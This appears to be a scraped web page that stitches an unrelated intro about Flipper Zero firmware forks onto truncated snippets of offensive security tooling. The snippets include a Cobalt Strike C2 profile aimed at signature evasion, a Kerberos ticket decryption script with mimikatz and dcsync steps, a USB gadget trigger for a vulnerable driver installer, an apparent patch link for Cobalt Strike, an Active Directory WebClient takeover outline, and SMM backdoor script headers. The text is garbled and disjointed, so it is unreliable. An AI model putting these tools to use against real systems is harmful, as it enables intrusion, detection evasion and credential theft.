(Adapted from Nano's original messages in the Unleashed firmware Discord.)
This document will (hopefully) maintain a list of differences between various forks of the Flipper Zero firmware.
If I had a dollar for every time I've seen this question asked,
I wouldn't be in college debt. ¯\_(ツ)_/¯
Also consider checking out my Awesome Flipper Zero repo, and my
| # in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) | |
| # as stage0, remote injecting a thread into a suspended process works | |
| set host_stage "false"; | |
| set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; | |
| set sleeptime "10000"; | |
| stage { | |
| set allocator "MapViewOfFile"; | |
| set name "notevil.dll"; |
| #!/usr/bin/env python3 | |
| # NOTE: this script was created for educational purposes to assist learning about kerberos tickets. | |
| # Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets. | |
| # | |
| # Recommended Instructions: | |
| # Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export" | |
| # Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>" | |
| # Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket) | |
| # Run this script to decrypt: | |
| # ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./Administrator@TESTLAB.LOCAL_krbtgt~TESTLAB.LOCAL@TESTLAB.LOCAL.ccaches |
With its built-in Bluetooth capabilities, the ESP32 can act as a Bluetooth keyboard. The below code is a minimal example of how to achieve it. It will generate the key strokes for a message whenever a button attached to the ESP32 is pressed.
For the example setup, a momentary button should be connected to pin 2 and to ground. Pin 2 will be configured as an input with pull-up.
In order to receive the message, add the ESP32 as a Bluetooth keyboard of your computer or mobile phone:
| # MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID | |
| # devices for triggering the vulnerable Windows Driver installer | |
| # credits for the Windows Driver install vuln: @j0nh4t | |
| # | |
| # https://twitter.com/j0nh4t/status/1429049506021138437 | |
| # https://twitter.com/an0n_r0/status/1429263450748895236 | |
| # | |
| # the script was developed & tested on Android LineageOS 18.1 |
| http://transfer.sh3ll.me/K3wEk/cobaltstrike.jar.patch |
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
| #!/usr/bin/env python | |
| import sys, os, platform, ctypes, ctypes.wintypes | |
| from struct import pack, unpack | |
| import smm_backdoor as bd | |
| # MSR register used by swapgs | |
| IA32_KERNEL_GS_BASE = 0xc0000102 |
| #!/usr/bin/env python | |
| import sys, os, time, platform, ctypes | |
| from struct import pack, unpack | |
| from optparse import OptionParser, make_option | |
| import smm_backdoor as bd | |
| # how many seconds to wait for VM exit occur | |
| VM_EXIT_WAIT = 3 |
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |